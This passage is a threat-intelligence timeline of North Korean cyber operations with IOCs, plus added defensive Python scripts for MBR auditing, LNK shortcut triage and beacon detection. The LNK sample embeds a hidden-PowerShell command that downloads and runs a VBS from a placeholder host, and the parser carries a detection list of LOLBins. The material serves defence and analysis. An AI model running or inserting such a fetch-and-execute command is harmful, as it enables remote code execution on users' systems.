INTERPOL’s Supernote Summit wherein they decide to change the bill.
Date:: 2006-07-26
Reported to be manufactured in North Korea, the Supernote is a high-quality counterfeit of the US 50-dollar and 100-dollar notes, also known as a Superdollar. The notes are produced using processes and materials similar to those of genuine US currency.
First detected in 1989; over $50M worth had been found as of 2006.
A large-scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).
Operation Troy DDoS Attacks
Date:: 2009-2012
A cyber-espionage campaign that used unsophisticated DDoS attacks to target the South Korean government
“Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.
On March 4, 2011, exactly 20 months to the day after a similar incident on US Independence Day in 2009, a botnet based in South Korea launched Distributed Denial of Service (DDoS) attacks against 40 sites affiliated with the South Korean government, military and civilian critical infrastructure, as well as U.S. Forces Korea and the U.S. Air Force base at Kunsan, South Korea.
Prosecutors said that a laptop used by a subcontractor "became in September 2010 a zombie PC operated by the North, which... later remotely staged the attack through the laptop".
One of the Internet Protocol (IP) addresses used to break into Nonghyup's system was the same as one used in March for a distributed denial-of-service (DDoS) attack that originated in North Korea, they added.
The software used in the incident was also similar to that employed in July 2009, when a number of South Korean government websites were attacked, the prosecutors said.
The hackers made the laptop a zombie computer on Sept. 4 in 2010 and managed it for seven months, obtaining inside information and operating the file deletion command remotely, according to the prosecution.
DarkSeoul Wiper Attacks
Date:: 2013-03-20
DarkSeoul: a wiper attack that targeted three South Korean broadcasters, financial institutions, and an ISP
At the time, two other groups using the personas “NewRomanic Cyber Army Team” and “WhoIs Team” took credit for the attack
2014
Sony Pictures Hack Wiper Attack Occurs
Date:: 2014-11-24
The target was Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
Perpetrators identified themselves as the Guardians of Peace.
Large amounts of data were stolen and slowly leaked in the days following the attack.
U.S. investigators say the culprits spent at least two months copying critical files
The attack was conducted using malware, including a Server Message Block (SMB) worm tool
Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
November 24, 2014 - previously installed malware rendered many Sony employees' computers inoperable and displayed a warning from a group calling itself the Guardians of Peace, along with a portion of the confidential data taken during the hack.
Several Sony-related Twitter accounts were also taken over
Operation Red Dot against South Korean Govt/Defence Co's
Date:: 2014-2015
Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
The document files listed in Table 3 of AhnLab's report are decoys disguised as legitimate documents, such as address books, deposit slips and invitations, to lure victims into opening them.
By March the hackers had a backdoor into the bank's electronic communication system, allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols and did not alert security to their presence.
SWIFT Heists
Date:: 2015-2019
Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.
Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK
The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, brute-forcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database.
Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.
Date:: 2015-2018
BAE Systems Threat Research Blog: Cyber Heist Attribution
FASTCash - $16M was withdrawn from roughly 1,700 7-Eleven ATMs across Japan using card data stolen from South Africa’s Standard Bank
Date:: 2016-05-14
Tien Phong Bank in Vietnam SWIFT Heist - $1M
Date:: 2016-05-15
Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist
SWIFT Heists - Symantec links a Philippines bank attack to the Bangladesh Bank attackers
Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a “wider and highly adaptive campaign” is underway targeting banks.
A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks was; however, code sharing between Trojan.Banswift (used in the Bangladesh attack to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.
SWIFT Heists - Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks
Multiple spear-phishing campaigns targeting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S. Department of State, and the U.S. Department of Defense
The stolen material included documents known as Operational Plan 5015, a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”
2017
Lazarus Under The Hood
Date:: 2017-04-03
Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
Creation of the destructive WannaCry 2.0 ransomware in May 2017
The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware.
210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
175.45.178.222 - National Defence Commission
175.45.178.19 - Ghost RAT
175.45.178.97 - Ghost RAT
Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures reportedly employed during this compromise were different from those we have observed in subsequent intrusion attempts, and as yet there are no clear indications of North Korean involvement.)
Date:: 2017-04-22
The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
Date:: 2017-04-26
Spearphishing against South Korean Exchange #1 begins.
Date:: 2017-05-01
South Korean Exchange #2 compromised via spearphish.
Date:: 2017-05-30
More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
Date:: 2017-06-01
CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
Date:: 2017-06-13
This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
The World Once Laughed at North Korean Cyberpower. No More.
CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange
DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
Two files are 32-bit Windows executables that function as proxy servers and implement a Fake TLS method.
The third file is an Executable and Linkable Format (ELF) file designed to run on Android platforms as a fully functioning Remote Access Trojan.
2018
TrendMicro's KillDisk Variant Hits Latin American Financial Groups
DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.
Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.
SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.
CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
Date:: 2018-05-29
CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
MAR 10135536-3: HIDDEN COBRA RAT/Worm
This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.
NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea
Banco de Chile Wiper Attack Just a Cover for $10M SWIFT Heist
Date:: 2018-06-13
Analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them.
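The wiper entries on this page (the 2009 DDoS malware that wrote “Memory of Independence Day” into the MBR, SHARPKNOT, and the kill_os module here) all leave the first sector of the disk without a usable partition table or boot signature. The script below is an added example written for this page, not code from any of the cited reports or tools: it audits a 512-byte sector the way a responder would when triaging an image from a wiped host, checking the 0x55AA signature, sanity-checking the four DOS partition entries, and pulling printable strings out of the boot-code area where stamped wiper messages end up. Both sample sectors are constructed inside the block.

```python
import struct
from itertools import combinations

MBR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"
PARTITION_TABLE_OFFSET = 446
# boot flag, CHS start, type, CHS end, LBA start, sector count
ENTRY = struct.Struct("<B3sB3sII")


def parse_partitions(mbr: bytes):
    """Return the non-empty entries of the four-slot DOS partition table."""
    parts = []
    for i in range(4):
        boot, _chs0, ptype, _chs1, lba, count = ENTRY.unpack_from(mbr, PARTITION_TABLE_OFFSET + 16 * i)
        if ptype or lba or count:
            parts.append({"slot": i, "boot": boot, "type": ptype, "lba": lba, "sectors": count})
    return parts


def ascii_strings(data: bytes, min_len: int = 8):
    """Printable ASCII runs of at least min_len bytes (the usual `strings` heuristic)."""
    out, run = [], bytearray()
    for b in data + b"\x00":          # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


def audit_mbr(mbr: bytes):
    """Return a list of findings; an empty list means the sector looks structurally intact."""
    findings = []
    if len(mbr) != MBR_SIZE:
        return [f"expected {MBR_SIZE} bytes, got {len(mbr)}"]
    if mbr[510:512] != BOOT_SIGNATURE:
        findings.append("missing 0x55AA boot signature")
    parts = parse_partitions(mbr)
    if not parts:
        findings.append("partition table is empty")
    for p in parts:
        if p["boot"] not in (0x00, 0x80):
            findings.append(f"slot {p['slot']}: invalid boot indicator 0x{p['boot']:02x}")
        if p["sectors"] == 0:
            findings.append(f"slot {p['slot']}: zero-length partition")
    for a, b in combinations(parts, 2):
        if a["lba"] < b["lba"] + b["sectors"] and b["lba"] < a["lba"] + a["sectors"]:
            findings.append(f"slots {a['slot']} and {b['slot']} overlap")
    # A wiper that stamps a message into the sector leaves it as readable text in the
    # boot-code area. Genuine boot code also carries short error strings, so this is a lead,
    # not proof on its own.
    for s in ascii_strings(mbr[:PARTITION_TABLE_OFFSET]):
        findings.append(f"text in boot code area: {s!r}")
    return findings


def _entry(boot: int, ptype: int, lba: int, count: int) -> bytes:
    return ENTRY.pack(boot, b"\xff\xff\xff", ptype, b"\xff\xff\xff", lba, count)


# Constructed samples, not sectors from any incident. GOOD_MBR has zeroed boot code and one
# bootable NTFS-typed partition; WIPED_MBR mimics a sector overwritten with a message.
GOOD_MBR = bytes(PARTITION_TABLE_OFFSET) + _entry(0x80, 0x07, 2048, 204800) + bytes(16) * 3 + BOOT_SIGNATURE
WIPED_MBR = (b"Memory of Independence Day" + bytes(MBR_SIZE))[:MBR_SIZE]

if __name__ == "__main__":
    for label, sector in (("good", GOOD_MBR), ("wiped", WIPED_MBR)):
        print(label, audit_mbr(sector) or ["no findings"])
```

To run it against a real image, read the first 512 bytes of the disk or image file (on Linux, dd if=/dev/sdX bs=512 count=1) and pass them to audit_mbr. Treat the missing signature or an empty table as the decisive sign and the text finding as a pointer to what the wiper wrote.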
DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.
Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this “Operation GoldenAxe”. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.
CISA's analysis of North Korean Trojan: KEYMARBLE
Date:: 2018-08-09
AR 10135536-17
DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.
DOJ’s Criminal Complaint against North Korean Regime-Backed Programmer Park Jin Hyok
Date:: 2018-09-06
Nathan P. Shields, FBI, Los Angeles Field Office
Park worked for the front company “Chosun Expo Joint Venture,” aka “Korea Expo Joint Venture,” aka “Chosun Expo.”
Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts
Date:: 2018-11-01
Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.
Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses
Date:: 2018
New ability to target macOS.
Victims were infected after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited; the application itself showed no signs of malicious behaviour and looked genuine. The malware was delivered through the app's update files. Users installed the program via a download link delivered over email.
For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains commands that run when the file is executed; the chain runs from the shortcut being executed to the launch of a VBScript-based downloader.
CryptoCore
C2:: service.amzonnews[.]club
C2:: 75.133.9[.]84
C2:: update.gdrives[.]top
C2:: googledrive[.]network
C2:: drverify.dns-cloud[.]net
C2:: docs.googlefiledrive[.]com
C2:: europasec.dnsabr[.]com
C2:: eu.euprotect[.]net
C2:: 092jb_378v3_1.googldocs[.]org
C2:: gbackup.gogleshare[.]xyz
C2:: drive.gogleshare[.]xyz
C2:: down.financialmarketing[.]live
C2:: drivegoogle.publicvm[.]com
C2:: googledrive.publicvm[.]com
C2:: mskpupdate.publicvm[.]com
C2:: googledrive[.]email
C2:: iellsfileshare.sharedrivegght[.]xyz
C2:: download.showprice[.]xyz
C2:: downs.showprice[.]xyz
C2:: mdown.showprice[.]xyz
C2:: start.showprice[.]xyz
C2:: u13580130.ct.sendgrid[.]net
CISA's analysis of North Korean Malware ELECTRICFISH and BADCALL
Date:: 2019-09-09
MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH. Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
MAR 10135536-10: North Korean Trojan: BADCALL. Note: this version of the BADCALL MAR updates the February 6, 2018 version, and a STIX file is included.
CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.
Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups
Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistent threat actor responsible for multiple cyberespionage and cyber sabotage operations.
Indian Nuclear Power Plant Attack
We have long known and continuously monitored that North Korea is attacking India.
This is an image of the history of malware used by the North Korean hacker group B that hacked the Kudankulam Nuclear Power Plant(KKNPP) in India. A 16-digit string dkwero38oerA^t@# is the password that malware uses to compress a list of files on an infected PC.
CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT
Date:: 2020-02-14
Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
The BISTROMATH MAR covers multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
The CROWDEDFLOUNDER MAR covers a Themida-packed Windows executable.
HOTCROISSANT is a full-featured beaconing implant.
ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
BUFFETLINE is a full-featured beaconing implant.
The HOPLIGHT MAR covers multiple malicious executable files, some of which are proxy applications that mask traffic between the malware and the remote operators.
Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group
How an elaborate North Korean crypto hacking heist fell apart
Date:: 2020-03-05
Two of the usernames adopted were “snowsjohn” and “khaleesi”. Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange.
UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, which we have named CAKETAP.
Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.
U.S. Government Advisory: Guidance on the North Korean Cyber Threat
Date:: 2020-04-15
The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.
CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH
Date:: 2020-05-12
MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
CISA, FBI, and DoD identified three malware variants used by the North Korean government.
COPPERHEDGE is a member of the Manuscrypt family of malware, which is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.
U.S. Government Advisory: Top 10 Routinely Exploited Vulnerabilities
Date:: 2020-05-12
CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.
US Charges 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons
Date:: 2020-05-28
Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions.
The group often uses Google Drive as the storage for its files, specifically the bait
Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
.xyz TLD via NameCheap
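Two of the tradecraft points above, the LNK shortcut hidden behind the icon and name of a text file (the “Password.txt.lnk” in the AppleJeus entry earlier on this page) and LNK files used as downloaders, are both visible in the shortcut's own metadata: the target it runs, the arguments, the icon it borrows, and the ShowCommand value that keeps the window out of sight. The parser below is an added example written for this page, not a tool from any of the cited reports; it follows the MS-SHLLINK layout (fixed header, optional IDList and LinkInfo blocks, then the StringData items) and applies a few triage rules. The sample shortcut, including the example.invalid URL in its arguments, is constructed inline so the block runs offline.

```python
import struct
from dataclasses import dataclass, field

# Constants from the MS-SHLLINK specification (Shell Link binary file format).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that launches the target minimised and unfocused
# Interpreters and LOLBins a "document" shortcut has no business starting.
SUSPICIOUS = ("powershell", "mshta", "wscript", "cscript", "cmd.exe", "rundll32", "certutil", "bitsadmin")


@dataclass
class ShellLink:
    show_command: int
    strings: dict = field(default_factory=dict)  # name, relative_path, working_dir, arguments, icon_location

    def indicators(self) -> list:
        """Triage heuristics for a shortcut posing as a document."""
        hits = []
        if self.show_command == SW_SHOWMINNOACTIVE:
            hits.append("window minimised (SW_SHOWMINNOACTIVE)")
        cmdline = (self.strings.get("relative_path", "") + " " + self.strings.get("arguments", "")).lower()
        for tool in SUSPICIOUS:
            if tool in cmdline:
                hits.append(f"invokes {tool}")
        icon = self.strings.get("icon_location", "").lower()
        if icon and any(t in cmdline for t in SUSPICIOUS) and not any(t in icon for t in SUSPICIOUS):
            hits.append(f"icon borrowed from {icon}")
        return hits


def _read_string(buf: bytes, off: int, unicode: bool):
    """StringData item: 2-byte character count followed by the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        text = buf[off:off + 2 * count].decode("utf-16-le")
        off += 2 * count
    else:
        text = buf[off:off + count].decode("cp1252")
        off += count
    return text, off


def parse_lnk(buf: bytes) -> ShellLink:
    if (len(buf) < LNK_HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != LNK_HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_command,) = struct.unpack_from("<I", buf, 60)
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:            # LinkTargetIDList: 2-byte size (excluding itself), then the list
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:          # LinkInfo: 4-byte total size that includes the size field
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    strings = {}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if flags & bit:
            strings[key], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return ShellLink(show_command, strings)


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList/LinkInfo) so the parser can be exercised offline."""
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample, not a real capture: a shortcut wearing notepad's icon that fetches a VBS stager.
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
    arguments='/c powershell -w hidden -ep bypass -c "iwr http://example.invalid/p.vbs -OutFile %TEMP%\\p.vbs; wscript %TEMP%\\p.vbs"',
    icon_location="%SystemRoot%\\System32\\notepad.exe",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    link = parse_lnk(SAMPLE_LNK)
    for key, value in link.strings.items():
        print(f"{key:14} {value}")
    print("indicators:", link.indicators())
```

parse_lnk takes raw bytes, so it works on a file read with open(path, "rb") as well as on the constructed sample. The heuristics are deliberately blunt and will flag legitimate administrative shortcuts; that is acceptable in an attachment-triage pipeline, where a shortcut that looks like a document should never be invoking an interpreter at all.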
The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.
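The VBS stage above checks in with its C2 every minute and expects more VBS back, and the PowerShell C2 scripts in the 2018 entry hide behind WordPress-looking paths. Whatever the disguise, a timer-driven implant leaves a fixed period in proxy logs that a person browsing does not. The script below is an added example, not code from any of the cited reports: it parses a constructed proxy log (the client IPs, hosts and the /wp-includes/update.php path are made up for this example) and flags client/host/path tuples whose inter-request gaps have low relative jitter. It generalises past the one-minute case to any fixed period up to an hour.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log, not a real capture: "<ISO timestamp> <client IP> <method> <URL>".
# 10.0.0.15 hits the same script once a minute with almost no jitter; 10.0.0.22 is a person browsing.
SAMPLE_LOG = """\
2020-11-02T12:00:00 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
2020-11-02T12:00:05 10.0.0.22 GET http://www.example.invalid/index.html
2020-11-02T12:00:10 10.0.0.22 GET http://www.example.invalid/index.html
2020-11-02T12:01:00 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
2020-11-02T12:02:01 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
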